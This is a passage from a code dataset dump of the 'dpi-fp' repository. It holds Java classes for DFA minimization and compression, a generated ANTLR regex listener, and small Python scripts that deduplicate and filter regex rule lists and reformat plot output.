}).collect(Collectors.toSet()));\n// }\n//\n// nodes.set(i, null);\n// if (dfa.getStart() == a) {\n// dfa.setStart(b);\n// } // TODO: update queue\n\n // TODO: resolve conflicts && add to mergeQueue\n // TODO: hashset\n }\n\n private boolean runMerge() {\n Integer foundI = null, foundJ = null;\n for (int i = 0; foundI == null && i < nodes.size(); i++) {\n for (int j = 0; foundI == null && j < i; j++) {\n if (distinct[i][j] == -1 && !nodes.get(i).isTerminal() && !nodes.get(j).isTerminal()) {\n foundI = i;\n foundJ = j;\n }\n }\n }\n if (foundI == null) {\n return false;\n }\n\n mergeQueue = new 
MergeGraph(nodes.size());\n mergeQueue.addPair(foundI, foundJ);\n while (!mergeQueue.isEmpty()) {\n Set<Integer> cur = mergeQueue.getMergeList();\n mergeAll(cur);\n }\n return true;\n }\n\n public void compress(Dfa dfa) {\n dfa.close();\n this.dfa = dfa;\n\n boolean updated = true;\n while (updated) {\n buildMatrix();\n updated = runMerge();\n }\n }\n\n private static class MergeGraph {\n private ArrayList<Integer>[] graph;\n private HashSet<Integer> involved = new HashSet<>();\n private HashSet<Integer> collected;\n\n public MergeGraph(int size) {\n graph = new ArrayList[size];\n for (int i = 0; i < size; i++) {\n graph[i] = new ArrayList<>();\n }\n }\n\n\n public void addPair(int i, int j) {\n if (i == j) {\n return;\n }\n graph[i].add(j);\n graph[j].add(i);\n involved.add(i);\n involved.add(j);\n }\n\n private void traverse(int c) {\n collected.add(c);\n graph[c].forEach(x -> {\n if (!collected.contains(x)) {\n traverse(x);\n }\n });\n }\n\n public Set<Integer> getMergeList() {\n collected = new HashSet<>();\n int head = involved.iterator().next();\n traverse(head);\n collected.forEach(id -> {\n graph[id].clear();\n involved.remove(id);\n });\n return collected;\n }\n\n public boolean isEmpty() {\n return involved.isEmpty();\n }\n }\n}\n"
},
{
"alpha_fraction": 0.3625146746635437,
"alphanum_fraction": 0.36398354172706604,
"avg_line_length": 37.681819915771484,
"blob_id": "23472d9141ec71ad7c549f4d5a475ace90dfb185",
"content_id": "a7bde2b9dbcd1f553e4bf19f3597a0ff52f253a4",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Java",
"length_bytes": 3404,
"license_type": "no_license",
"max_line_length": 80,
"num_lines": 88,
"path": "/src/main/java/automaton/algo/compressor/heuristic/DfaCompressorOld1.java",
"repo_name": "notantony/dpi-fp",
"src_encoding": "UTF-8",
"text": "package automaton.algo.compressor.heuristic;\n\nimport automaton.dfa.Dfa;\nimport automaton.dfa.Node;\nimport util.Pair;\n\nimport java.util.*;\nimport java.util.stream.Collectors;\n\npublic class DfaCompressorOld1 {\n public void compress(Dfa dfa) {\n Map<Node, Set<Pair<Character, Node>>> mp = new HashMap<>();\n HashSet<Node> nodes = new HashSet<>(dfa.allNodes());\n for (Node node : nodes) {\n mp.put(node, new HashSet<>());\n }\n for (Node node : nodes) {\n node.getEdges().forEach((c, target) -> {\n mp.get(target).add(new Pair<>(c, node));\n });\n }\n boolean found = true;\n while (found) {\n found = false;\n List<Node> ordered = new ArrayList<>(nodes);\n for (int i = 0; !found && i < ordered.size(); i++) {\n for (int j = 0; !found && j < i; j++) {\n Node a = ordered.get(i);\n if (a.isTerminal()) {\n continue;\n }\n Map<Character, Node> aEdges = a.getEdges();\n Node b = ordered.get(j);\n if (b.isTerminal()) {\n continue;\n }\n Map<Character, Node> bEdges = b.getEdges();\n boolean failed = false;\n if (aEdges.size() >= bEdges.size()) {\n Map<Character, Node> tmp = aEdges;\n aEdges = bEdges;\n bEdges = tmp;\n Node tmp1 = a;\n a = b;\n b = tmp1;\n }\n for (Map.Entry<Character, Node> entry : aEdges.entrySet()) {\n char c = entry.getKey();\n Node target = entry.getValue();\n if (bEdges.containsKey(c) && bEdges.get(c) != target) {\n failed = true;\n }\n }\n\n if (!failed) {\n found = true;\n\n Node finalA = a;\n Node finalB = b;\n aEdges.forEach((c, target) -> {\n if (target == finalA) {\n finalB.addEdge(c, finalB);\n } else {\n mp.get(target).remove(new Pair<>(c, finalA));\n mp.get(target).add(new Pair<>(c, finalB));\n finalB.addEdge(c, target);\n }\n });\n for (Pair<Character, Node> pair : mp.get(a)) {\n pair.getSecond().addEdge(pair.getFirst(), b);\n }\n mp.get(b).addAll(mp.get(a).stream().map(pair -> {\n if (pair.getSecond() == finalA) {\n return new Pair<>(pair.getFirst(), finalB);\n }\n return pair;\n }).collect(Collectors.toSet()));\n\n nodes.remove(a);\n if (dfa.getStart() == a) {\n dfa.setStart(b);\n }\n }\n }\n }\n }\n }\n}\n"
},
{
"alpha_fraction": 0.6000000238418579,
"alphanum_fraction": 0.6000000238418579,
"avg_line_length": 42,
"blob_id": "da26c8cd2d26d663fba29da3d4b76aaf3b4bf64b",
"content_id": "0976688f3a85469a1d5e7f9af64899146bcd8a69",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 215,
"license_type": "no_license",
"max_line_length": 50,
"num_lines": 5,
"path": "/input/gen_unique.py",
"repo_name": "notantony/dpi-fp",
"src_encoding": "UTF-8",
"text": "with open('./rules.txt') as rules:\n rules_list = rules.read().rstrip().split('\\n')\n rules_list = set(rules_list)\n with open('./unique.txt', 'w') as unique:\n unique.write(\"\\n\".join(list(rules_list)))\n"
},
{
"alpha_fraction": 0.6061157584190369,
"alphanum_fraction": 0.6126683950424194,
"avg_line_length": 33.772151947021484,
"blob_id": "5871a39c14b8fc956e90d49a80cc6bc8d1ebe683",
"content_id": "63aa3d08ae4d807d1a4e72666571c8a9698e409e",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Java",
"length_bytes": 2747,
"license_type": "no_license",
"max_line_length": 120,
"num_lines": 79,
"path": "/src/main/java/util/Utils.java",
"repo_name": "notantony/dpi-fp",
"src_encoding": "UTF-8",
"text": "package util;\n\nimport java.io.BufferedReader;\nimport java.io.BufferedWriter;\nimport java.io.IOException;\nimport java.nio.file.Files;\nimport java.nio.file.Path;\nimport java.nio.file.Paths;\nimport java.nio.file.StandardOpenOption;\nimport java.util.Collection;\nimport java.util.HashMap;\nimport java.util.Map;\nimport java.util.function.*;\nimport java.util.logging.Logger;\n\npublic class Utils {\n public static char parseChar(String s) {\n if (s.startsWith(\"\\\\x\")) {\n return (char) Integer.parseInt(s.substring(2), 16);\n } else if (s.length() == 1) {\n return s.charAt(0);\n }\n throw new IllegalArgumentException(\"Unexpected char sequence to parse: `\" + s + \"`\");\n }\n\n public static Collection<Integer> testHeader(Function<String, Collection<Integer>> predicate, String s) {\n s = (char) 257 + s + (char) 256;\n Collection<Integer> result = predicate.apply(s);\n for (int i = 0; i <= s.length(); i++) {\n result.addAll(predicate.apply(s.substring(i)));\n }\n return result;\n }\n\n public static <T, X> X timeit(Function<T, X> function, T arg) {\n long pre = System.currentTimeMillis();\n X tmp = function.apply(arg);\n long post = System.currentTimeMillis();\n Logger.getGlobal().info(function.getClass().getCanonicalName() + \": \" + (post - pre));\n return tmp;\n }\n\n public static <T, V, X> X timeit(BiFunction<T, V, X> function, T arg, V arg1) {\n return timeit(function, arg, arg1, \"\");\n }\n\n private static Map<String, Long> timeLog = new HashMap<>();\n public static <T, V, X> X timeit(BiFunction<T, V, X> function, T arg, V arg1, String label) {\n long pre = System.currentTimeMillis();\n X tmp = function.apply(arg, arg1);\n long post = System.currentTimeMillis();\n// Logger.getGlobal().info(label + (post - pre));\n long timing = post - pre;\n System.err.println(label + timing);\n timeLog.putIfAbsent(label, 0L);\n timeLog.put(label, timeLog.get(label) + timing);\n return tmp;\n }\n\n public static void printTimeLog() {\n System.err.println(timeLog.toString());\n }\n\n public static void writeTo(String pathStr, String s) {\n try {\n Path path = Paths.get(pathStr);\n Files.createDirectories(path.getParent());\n BufferedWriter writer = Files.newBufferedWriter(path, StandardOpenOption.APPEND, StandardOpenOption.CREATE);\n writer.write(s);\n writer.flush();\n } catch (IOException e) {\n throw new RuntimeException(e);\n }\n }\n\n public static String objCode(Object o) {\n return o == null ? \"null\" : o.toString().split(\"@\")[1];\n }\n}\n"
},
{
"alpha_fraction": 0.5897186994552612,
"alphanum_fraction": 0.602327823638916,
"avg_line_length": 40.20000076293945,
"blob_id": "2e98060fd7759a5c35f39b41f3d742185484fe5a",
"content_id": "8e06aceb52ece87504d186e2cc6ee6ca47fcf1b8",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1031,
"license_type": "no_license",
"max_line_length": 121,
"num_lines": 25,
"path": "/output/reformat_plot.py",
"repo_name": "notantony/dpi-fp",
"src_encoding": "UTF-8",
"text": "\n\nwith open('plot.txt') as plot_fs:\n a = plot_fs.readline()\n data = []\n while a:\n x = a.rstrip()\n data_lines = [plot_fs.readline().rstrip() for _ in range(7)]\n data_lines = list(map(lambda line: line.split(\": \")[1], data_lines))\n data_lines = [x] + [data_lines[i] for i in [0, 2, 5, 6]]\n data.append(data_lines)\n a = plot_fs.readline().rstrip()\n\nwith open('formatted.txt', 'w') as formatted_fs:\n for i in range(len(data[0]) - 1):\n for row in data:\n formatted_fs.write(\"({},{})\".format(row[0], row[i + 1]))\n formatted_fs.write('\\n')\n\nimport csv\nwith open('out.csv', 'w') as csvfile:\n # spamwriter = csv.writer(csvfile, delimiter=' ', quotechar='|', quoting=csv.QUOTE_MINIMAL)\n spamwriter = csv.writer(csvfile, quoting=csv.QUOTE_MINIMAL)\n index = ['x', 'Minimized', 'ThompsonModifiedHeuristic', 'ThompsonModifiedHeuristic5', 'ThompsonModifiedHeuristic10'] \n spamwriter.writerow(index) \n for row in data:\n spamwriter.writerow(row)"
},
{
"alpha_fraction": 0.7250000238418579,
"alphanum_fraction": 0.7266025543212891,
"avg_line_length": 32.196807861328125,
"blob_id": "8dac2965c13acccb8aaffe2b7665e9dcd6606d57",
"content_id": "c2e69912ac3ba189e8e8e5b2fcdb1007f38021f5",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Java",
"length_bytes": 6240,
"license_type": "no_license",
"max_line_length": 76,
"num_lines": 188,
"path": "/src/main/generated/antlr/RegexListener.java",
"repo_name": "notantony/dpi-fp",
"src_encoding": "UTF-8",
"text": "// Generated from F:/repo/java/dpi-fp/src/main/grammar\\Regex.g4 by ANTLR 4.8\npackage antlr;\nimport org.antlr.v4.runtime.tree.ParseTreeListener;\n\n/**\n * This interface defines a complete listener for a parse tree produced by\n * {@link RegexParser}.\n */\npublic interface RegexListener extends ParseTreeListener {\n\t/**\n\t * Enter a parse tree produced by {@link RegexParser#start}.\n\t * @param ctx the parse tree\n\t */\n\tvoid enterStart(RegexParser.StartContext ctx);\n\t/**\n\t * Exit a parse tree produced by {@link RegexParser#start}.\n\t * @param ctx the parse tree\n\t */\n\tvoid exitStart(RegexParser.StartContext ctx);\n\t/**\n\t * Enter a parse tree produced by {@link RegexParser#params}.\n\t * @param ctx the parse tree\n\t */\n\tvoid enterParams(RegexParser.ParamsContext ctx);\n\t/**\n\t * Exit a parse tree produced by {@link RegexParser#params}.\n\t * @param ctx the parse tree\n\t */\n\tvoid exitParams(RegexParser.ParamsContext ctx);\n\t/**\n\t * Enter a parse tree produced by {@link RegexParser#charset}.\n\t * @param ctx the parse tree\n\t */\n\tvoid enterCharset(RegexParser.CharsetContext ctx);\n\t/**\n\t * Exit a parse tree produced by {@link RegexParser#charset}.\n\t * @param ctx the parse tree\n\t */\n\tvoid exitCharset(RegexParser.CharsetContext ctx);\n\t/**\n\t * Enter a parse tree produced by {@link RegexParser#charsetRange}.\n\t * @param ctx the parse tree\n\t */\n\tvoid enterCharsetRange(RegexParser.CharsetRangeContext ctx);\n\t/**\n\t * Exit a parse tree produced by {@link RegexParser#charsetRange}.\n\t * @param ctx the parse tree\n\t */\n\tvoid exitCharsetRange(RegexParser.CharsetRangeContext ctx);\n\t/**\n\t * Enter a parse tree produced by {@link RegexParser#charsetValues}.\n\t * @param ctx the parse tree\n\t */\n\tvoid enterCharsetValues(RegexParser.CharsetValuesContext ctx);\n\t/**\n\t * Exit a parse tree produced by {@link RegexParser#charsetValues}.\n\t * @param ctx the parse tree\n\t */\n\tvoid exitCharsetValues(RegexParser.CharsetValuesContext ctx);\n\t/**\n\t * Enter a parse tree produced by {@link RegexParser#expr}.\n\t * @param ctx the parse tree\n\t */\n\tvoid enterExpr(RegexParser.ExprContext ctx);\n\t/**\n\t * Exit a parse tree produced by {@link RegexParser#expr}.\n\t * @param ctx the parse tree\n\t */\n\tvoid exitExpr(RegexParser.ExprContext ctx);\n\t/**\n\t * Enter a parse tree produced by {@link RegexParser#expr1}.\n\t * @param ctx the parse tree\n\t */\n\tvoid enterExpr1(RegexParser.Expr1Context ctx);\n\t/**\n\t * Exit a parse tree produced by {@link RegexParser#expr1}.\n\t * @param ctx the parse tree\n\t */\n\tvoid exitExpr1(RegexParser.Expr1Context ctx);\n\t/**\n\t * Enter a parse tree produced by {@link RegexParser#pureExpr}.\n\t * @param ctx the parse tree\n\t */\n\tvoid enterPureExpr(RegexParser.PureExprContext ctx);\n\t/**\n\t * Exit a parse tree produced by {@link RegexParser#pureExpr}.\n\t * @param ctx the parse tree\n\t */\n\tvoid exitPureExpr(RegexParser.PureExprContext ctx);\n\t/**\n\t * Enter a parse tree produced by {@link RegexParser#character}.\n\t * @param ctx the parse tree\n\t */\n\tvoid enterCharacter(RegexParser.CharacterContext ctx);\n\t/**\n\t * Exit a parse tree produced by {@link RegexParser#character}.\n\t * @param ctx the parse tree\n\t */\n\tvoid exitCharacter(RegexParser.CharacterContext ctx);\n\t/**\n\t * Enter a parse tree produced by {@link RegexParser#special}.\n\t * @param ctx the parse tree\n\t */\n\tvoid enterSpecial(RegexParser.SpecialContext ctx);\n\t/**\n\t * Exit a parse tree produced by {@link 
RegexParser#special}.\n\t * @param ctx the parse tree\n\t */\n\tvoid exitSpecial(RegexParser.SpecialContext ctx);\n\t/**\n\t * Enter a parse tree produced by {@link RegexParser#repeatedExpr}.\n\t * @param ctx the parse tree\n\t */\n\tvoid enterRepeatedExpr(RegexParser.RepeatedExprContext ctx);\n\t/**\n\t * Exit a parse tree produced by {@link RegexParser#repeatedExpr}.\n\t * @param ctx the parse tree\n\t */\n\tvoid exitRepeatedExpr(RegexParser.RepeatedExprContext ctx);\n\t/**\n\t * Enter a parse tree produced by {@link RegexParser#number}.\n\t * @param ctx the parse tree\n\t */\n\tvoid enterNumber(RegexParser.NumberContext ctx);\n\t/**\n\t * Exit a parse tree produced by {@link RegexParser#number}.\n\t * @param ctx the parse tree\n\t */\n\tvoid exitNumber(RegexParser.NumberContext ctx);\n\t/**\n\t * Enter a parse tree produced by the {@code rangeCounter}\n\t * labeled alternative in {@link RegexParser#repeatCounter}.\n\t * @param ctx the parse tree\n\t */\n\tvoid enterRangeCounter(RegexParser.RangeCounterContext ctx);\n\t/**\n\t * Exit a parse tree produced by the {@code rangeCounter}\n\t * labeled alternative in {@link RegexParser#repeatCounter}.\n\t * @param ctx the parse tree\n\t */\n\tvoid exitRangeCounter(RegexParser.RangeCounterContext ctx);\n\t/**\n\t * Enter a parse tree produced by the {@code lBorderCounter}\n\t * labeled alternative in {@link RegexParser#repeatCounter}.\n\t * @param ctx the parse tree\n\t */\n\tvoid enterLBorderCounter(RegexParser.LBorderCounterContext ctx);\n\t/**\n\t * Exit a parse tree produced by the {@code lBorderCounter}\n\t * labeled alternative in {@link RegexParser#repeatCounter}.\n\t * @param ctx the parse tree\n\t */\n\tvoid exitLBorderCounter(RegexParser.LBorderCounterContext ctx);\n\t/**\n\t * Enter a parse tree produced by the {@code rBorderCounter}\n\t * labeled alternative in {@link RegexParser#repeatCounter}.\n\t * @param ctx the parse tree\n\t */\n\tvoid enterRBorderCounter(RegexParser.RBorderCounterContext ctx);\n\t/**\n\t * Exit a parse tree produced by the {@code rBorderCounter}\n\t * labeled alternative in {@link RegexParser#repeatCounter}.\n\t * @param ctx the parse tree\n\t */\n\tvoid exitRBorderCounter(RegexParser.RBorderCounterContext ctx);\n\t/**\n\t * Enter a parse tree produced by the {@code exactCounter}\n\t * labeled alternative in {@link RegexParser#repeatCounter}.\n\t * @param ctx the parse tree\n\t */\n\tvoid enterExactCounter(RegexParser.ExactCounterContext ctx);\n\t/**\n\t * Exit a parse tree produced by the {@code exactCounter}\n\t * labeled alternative in {@link RegexParser#repeatCounter}.\n\t * @param ctx the parse tree\n\t */\n\tvoid exitExactCounter(RegexParser.ExactCounterContext ctx);\n\t/**\n\t * Enter a parse tree produced by {@link RegexParser#optionalExpr}.\n\t * @param ctx the parse tree\n\t */\n\tvoid enterOptionalExpr(RegexParser.OptionalExprContext ctx);\n\t/**\n\t * Exit a parse tree produced by {@link RegexParser#optionalExpr}.\n\t * @param ctx the parse tree\n\t */\n\tvoid exitOptionalExpr(RegexParser.OptionalExprContext ctx);\n}"
},
{
"alpha_fraction": 0.50018709897995,
"alphanum_fraction": 0.504865288734436,
"avg_line_length": 37.72463607788086,
"blob_id": "a97ae0e8d1314b26c01a6c83912f5e6823b40a66",
"content_id": "11fb53cf7d0a1682e94d107c9b083f73b4ae24c9",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Java",
"length_bytes": 5344,
"license_type": "no_license",
"max_line_length": 110,
"num_lines": 138,
"path": "/src/main/java/automaton/algo/HopcroftMinimizer.java",
"repo_name": "notantony/dpi-fp",
"src_encoding": "UTF-8",
"text": "package automaton.algo;\n\nimport automaton.dfa.Dfa;\nimport automaton.dfa.Node;\nimport automaton.transition.Transitions;\nimport util.Pair;\n\nimport java.util.*;\nimport java.util.logging.Logger;\n\npublic class HopcroftMinimizer {\n private Queue<Pair<Integer, Character>> queue = new ArrayDeque<>();\n private List<Node> nodes;\n private int[] classAssigned;\n private ArrayList<Integer>[][] inv;\n private ArrayList<Set<Integer>> partition;\n\n private int __debugPartitionNextMonitorSize = 512;\n\n private void preCalc(Dfa dfa) {\n HashMap<Node, Integer> back = new HashMap<>();\n nodes = new ArrayList<>(dfa.allNodes());\n\n for (int i = 0; i < nodes.size(); i++) {\n back.put(nodes.get(i), i);\n }\n\n inv = new ArrayList[nodes.size()][Transitions.MAX_CHAR + 1];\n for (int i = 0; i < nodes.size(); i++) {\n for (int j = 0; j <= Transitions.MAX_CHAR; j++) {\n inv[i][j] = new ArrayList<>();\n }\n }\n for (int i = 0; i < nodes.size(); i++) {\n int finalI = i;\n nodes.get(i).getEdges().forEach((c, target) -> {\n inv[back.get(target)][c].add(finalI);\n });\n }\n\n int maxTerm = nodes.stream().map(Node::getTerminal).map(terminals -> {\n if (terminals.size() > 1) {\n throw new AlgoException(\"Node has more than one terminal: \" + terminals);\n } else if (terminals.size() == 0) {\n return 0;\n }\n return terminals.get(0);\n }).reduce(Integer::max).orElse(0);\n maxTerm += 2;\n\n partition = new ArrayList<>();\n for (int i = 0; i < maxTerm; i++) {\n partition.add(new HashSet<>());\n }\n classAssigned = new int[nodes.size()];\n for (int i = 0; i < nodes.size(); i++) {\n List<Integer> terminals = nodes.get(i).getTerminal();\n int targetClass;\n if (terminals.size() == 1) {\n targetClass = terminals.get(0);\n } else {\n targetClass = maxTerm - 1;\n }\n partition.get(targetClass).add(i);\n classAssigned[i] = targetClass;\n }\n\n for (char c = 0; c <= Transitions.MAX_CHAR; c++) {\n for (int i = 0; i < maxTerm; i++) {\n queue.add(new Pair<>(i, c));\n }\n }\n }\n\n\n public Dfa run(Dfa dfa) {\n HashMap<Set<Integer>, Integer> newTerminals = new HashMap<>();\n dfa.allNodes().stream()\n .map(node -> new HashSet<>(node.getTerminal()))\n .distinct()\n .forEach(terms -> newTerminals.put(terms, newTerminals.size() + 1));\n dfa.allNodes().forEach(node -> {\n node.setTerminal(Collections.singletonList(newTerminals.get(new HashSet<>(node.getTerminal()))));\n });\n\n preCalc(dfa);\n\n while (!queue.isEmpty()) {\n Pair<Integer, Character> splitterPair = queue.poll();\n Map<Integer, List<Integer>> involved = new HashMap<>();\n char splitter = splitterPair.getSecond();\n for (Integer classMember : partition.get(splitterPair.getFirst())) {\n for (int partitionMember : inv[classMember][splitter]) {\n int i = classAssigned[partitionMember];\n involved.putIfAbsent(i, new ArrayList<>());\n involved.get(i).add(partitionMember);\n }\n }\n involved.forEach((i, members) -> {\n if (members.size() < partition.get(i).size()) {\n partition.add(new HashSet<>());\n if (partition.size() >= __debugPartitionNextMonitorSize) {\n Logger.getGlobal().info(\"Partition size exceeded \" + __debugPartitionNextMonitorSize);\n __debugPartitionNextMonitorSize *= 2;\n }\n int j = partition.size() - 1;\n for (int member : members) {\n partition.get(i).remove(member);\n partition.get(j).add(member);\n }\n if (partition.get(j).size() > partition.get(i).size()) {\n Set<Integer> tmp = partition.get(i);\n partition.set(i, partition.get(j));\n partition.set(j, tmp);\n }\n for (int classMember : partition.get(j)) {\n classAssigned[classMember] = 
j;\n }\n for (char c = 0; c <= Transitions.MAX_CHAR; c++) {\n queue.add(new Pair<>(j, c));\n }\n }\n });\n }\n\n Map<Set<Integer>, Node> bijection = new HashMap<>(partition.size());\n partition.forEach(set -> bijection.put(set, new Node()));\n Map<Node, Node> newNodes = new HashMap<>(partition.size());\n partition.forEach(set -> set.forEach(node -> newNodes.put(nodes.get(node), bijection.get(set))));\n\n for (Node node: nodes) {\n node.getEdges().forEach((c, target) -> newNodes.get(node).addEdge(c, newNodes.get(target)));\n newNodes.get(node).setTerminal(node.getTerminal());\n }\n\n return new Dfa(newNodes.get(dfa.getStart()));\n }\n}\n"
},
{
"alpha_fraction": 0.5916069746017456,
"alphanum_fraction": 0.5946775674819946,
"avg_line_length": 39.70833206176758,
"blob_id": "021d1b4fe379ded60d0b6088e530e99f5b982ef4",
"content_id": "7ef4ceba7f829fbdffb2fda8b597f648e829c8e3",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1954,
"license_type": "no_license",
"max_line_length": 100,
"num_lines": 48,
"path": "/input/filter.py",
"repo_name": "notantony/dpi-fp",
"src_encoding": "UTF-8",
"text": "import re\n\nclass RegexFilter:\n def __init__(self, cap_start_only=True, default_verdict=True, banned=set()):\n self.default_verdict = default_verdict\n self.counters = {'default': 0}\n self.rules = []\n\n self._add_filter_rule(lambda regex: regex in banned, 'banned')\n if cap_start_only:\n self._add_filter_rule(lambda regex: not regex.startswith('/^'), 'not_cap_start')\n num_backref_re = re.compile(r'\\\\\\d+')\n self._add_filter_rule(lambda regex: num_backref_re.search(regex) is not None, 'num_backref')\n self._add_filter_rule(lambda regex: r'(?P=' in regex, r'(?P=')\n self._add_filter_rule(lambda regex: r'(?!' in regex, r'(?!') \n self._add_filter_rule(lambda regex: r'(?=' in regex, r'(?=') \n self._add_filter_rule(lambda regex: r'\\b' in regex, r'\\b')\n\n\n def _add_filter_rule(self, rule, rulename, verdict=False):\n self.counters[rulename] = 0\n self.rules.append((rule, rulename, verdict))\n\n\n def __call__(self, regex):\n for rule, rulename, verdict in self.rules:\n if rule(regex):\n self.counters[rulename] += 1\n return verdict\n self.counters['default'] += 1\n return self.default_verdict\n\n\nwith open('./bans.txt') as bans:\n banned = set(list(bans.read().rstrip().split('\\n')))\n\n\nwith open('./unique.txt') as rules:\n rules_list = list(rules.read().rstrip().split('\\n'))\n rules_filter = RegexFilter(cap_start_only=True, banned=banned)\n result = list(filter(rules_filter, rules_list))\n result = list(map(lambda s: '/('.join(s.split('/', 1)), result))\n result = list(map(lambda s: ').*/'.join(s.rsplit('/', 1)), result))\n print('Verdicts, of {} rules:'.format(len(rules_list)))\n for rule, count in rules_filter.counters.items():\n print('{} : {}'.format(rule, count))\n with open('./filtered.txt', 'w') as filtered:\n filtered.write('\\n'.join(result))\n"
},
{
"alpha_fraction": 0.6465968489646912,
"alphanum_fraction": 0.6553228497505188,
"avg_line_length": 33.727272033691406,
"blob_id": "2969b1d7608a0860194ad76cc4f726ffbccc271f",
"content_id": "0034b95e523ddfb6cb4d7d8dff57cdc6a0ffe30b",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Java",
"length_bytes": 1146,
"license_type": "no_license",
"max_line_length": 103,
"num_lines": 33,
"path": "/src/main/java/main/debug/SingleDfaRun.java",
"repo_name": "notantony/dpi-fp",
"src_encoding": "UTF-8",
"text": "package main.debug;\n\nimport automaton.algo.compressor.recursive.RecursiveCompressorStatic;\nimport automaton.dfa.Dfa;\nimport main.Main;\n\nimport java.io.IOException;\nimport java.nio.file.Files;\nimport java.nio.file.Paths;\n\npublic class SingleDfaRun {\n public static void main(String[] args) throws IOException {\n// Dfa dfa = Dfa.parseDfa(Files.newBufferedReader(Paths.get(\"./input/single/single_dfa.txt\")));\n// new RecursiveCompressorStatic().compress(dfa);\n// System.out.println(dfa.nodesCount());\n// int x = dfa.nodesCount();\n// Main.compress(dfa);\n// assert x == dfa.nodesCount();\n//\n// Dfa dfa2 = Dfa.parseDfa(Files.newBufferedReader(Paths.get(\"./input/single/single_dfa.txt\")));\n// Main.compress(dfa2);\n// System.out.println(dfa2.nodesCount());\n// assert x <= dfa2.nodesCount();\n\n Dfa dfa2 = Dfa.parseDfa(Files.newBufferedReader(Paths.get(\"./input/single/single_dfa.txt\")));\n Main.compress(dfa2);\n int x = dfa2.nodesCount();\n Main.compress(dfa2);\n System.out.println(dfa2.nodesCount());\n assert x == dfa2.nodesCount();\n\n }\n}\n"
},
{
"alpha_fraction": 0.583038866519928,
"alphanum_fraction": 0.5971731543540955,
"avg_line_length": 34.375,
"blob_id": "9e9809390b0c74bd7dad62e3f82f33585a742c2e",
"content_id": "98c32538d1b4e73e64f375d4b46c7580d4de682b",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 283,
"license_type": "no_license",
"max_line_length": 67,
"num_lines": 8,
"path": "/output/graph/filter_sizes.py",
"repo_name": "notantony/dpi-fp",
"src_encoding": "UTF-8",
"text": "with open('./splitResults.txt') as results_fs:\n data = list(results_fs.read().rstrip().split('\\n'))\n\nwith open('./sizes.txt', 'w') as sizes_fs:\n result = [data[1 + i * 2] for i in range((len(data) - 1) // 2)]\n sizes_fs.write('\\n'.join(result))\n\nprint(sum(map(int, result)))\n"
},
{
"alpha_fraction": 0.4940750300884247,
"alphanum_fraction": 0.49818822741508484,
"avg_line_length": 34.0927848815918,
"blob_id": "17626a52363dc555deb6b7ff578f19a786726618",
"content_id": "a2674792dd62d0ab3fc711b6425b66fa50424360",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Java",
"length_bytes": 10211,
"license_type": "no_license",
"max_line_length": 123,
"num_lines": 291,
"path": "/src/main/java/automaton/dfa/Dfa.java",
"repo_name": "notantony/dpi-fp",
"src_encoding": "UTF-8",
"text": "package automaton.dfa;\n\nimport automaton.algo.AlgoException;\nimport automaton.nfa.Nfa;\nimport automaton.nfa.State;\nimport automaton.transition.SingleElementTransition;\nimport automaton.transition.Transition;\nimport automaton.transition.Transitions;\nimport util.Pair;\nimport util.Utils;\n\nimport java.io.BufferedReader;\nimport java.io.Reader;\nimport java.lang.reflect.Array;\nimport java.util.*;\nimport java.util.stream.Collectors;\n\npublic class Dfa {\n public enum ParsingMode {\n LETTERS_LIST, SINGLE_EDGE, DESERIALIZE\n }\n\n public enum PrintingMode {\n VISUALISE, SERIALIZE\n }\n\n private Node start;\n\n public Dfa(Node start) {\n this.start = start;\n }\n\n public Collection<Integer> testImpl(String string) {\n Set<Integer> result = new HashSet<>();\n Node cur = start;\n for (int i = 0; i < string.length(); i++) {\n result.addAll(cur.getTerminal());\n char c = string.charAt(i);\n Map<Character, Node> edges = cur.getEdges();\n if (edges.containsKey(c)) {\n cur = edges.get(c);\n } else {\n return result;\n }\n }\n result.addAll(cur.getTerminal());\n return result;\n }\n\n public boolean testAny(String string) {\n return !test(string).isEmpty();\n }\n\n public Collection<Integer> test(String string) {\n return Utils.testHeader(this::testImpl, string);\n }\n\n public Collection<Node> allNodes() {\n return runDfs(start);\n }\n\n public Collection<Node> runDfs(Node node) {\n Queue<Node> queue = new ArrayDeque<>();\n queue.add(node);\n HashSet<Node> visited = new HashSet<>(queue);\n while (!queue.isEmpty()) {\n Node cur = queue.poll();\n cur.getEdges().values().stream()\n .filter(target -> !visited.contains(target))\n .forEach(target -> {\n visited.add(target);\n queue.add(target);\n });\n }\n return visited;\n }\n\n public Integer nodesCount() {\n return allNodes().size();\n }\n\n public Node getStart() {\n return start;\n }\n\n public long cutCount() {\n Collection<Node> nodes = allNodes();\n return nodes.stream()\n .map(this::runDfs)\n .map(path -> {\n Set<Integer> visited = new HashSet<>();\n path.forEach(node -> visited.addAll(node.getTerminal()));\n return visited.size() > 1;\n }).filter(a -> a).count();\n// .map(path -> path.distinct().count() > 1).count();\n// return nodes.stream()\n// .map(this::runDfs)\n// .map(path -> path.stream()\n// .flatMap(node -> node.getTerminal().stream()))\n// .map(path -> path.distinct().count() > 1).filter(a -> a).count();\n }\n\n// public void print(PrintingMode mode) {\n// print();\n// }\n\n public String print() {\n return print(PrintingMode.VISUALISE);\n }\n\n public String print(PrintingMode mode) {\n Collection<Node> nodes = allNodes();\n Map<Node, Integer> map = new HashMap<>(); // TODO: convert map into list?\n int counter = 0;\n for (Node node : nodes) {\n map.put(node, counter++);\n }\n return printImpl(map, mode);\n }\n\n public String print(Map<Node, Integer> map) { // TODO: strings mapping?\n return printImpl(map, PrintingMode.VISUALISE);\n }\n\n private String printImpl(Map<Node, Integer> map, PrintingMode mode) {\n StringBuilder out = new StringBuilder();\n Collection<Node> nodes = allNodes();\n for (Node node : nodes) {\n if (node == start) {\n// System.out.println(\"s \" + map.get(node));\n out.append(\"Graph:\\n\");\n out.append(\"s \").append(map.get(node)).append(\"\\n\");\n }\n }\n\n Map<Pair<Integer, Integer>, List<String>> 